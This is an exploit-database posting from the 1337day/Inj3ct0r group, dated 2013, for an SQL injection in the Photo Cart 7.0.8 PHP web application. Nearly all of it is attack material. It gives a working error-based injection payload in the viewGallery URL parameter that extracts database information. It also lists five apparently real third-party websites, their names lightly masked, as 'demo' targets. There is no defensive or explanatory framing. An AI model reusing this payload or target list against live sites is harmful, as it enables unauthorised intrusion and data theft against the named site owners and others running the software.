1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm DaOne member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Photo Cart SQL Injection Vulnerability
# Date: 2013-03-09
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.picturespro.com/photo-cart/
# Category: webapps/php
# Version: 7.0.8
# Price: $329
##########################################
[#] Exploit
Error Based Injection:
http://{host}/pc_thumbnails7.php?page=1&viewGallery='%2B(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'
-Demo-
http://hamXa.com.au/clients/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.stkphXoto.com/photocart/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.natewXeatherly.com/photocart/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.custXardphotography.co.uk/photostore/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.surfthXespot.com/shop/pc_thumbnails7.php?page=1&viewGallery={SQL}
Greets to: All TGT Members..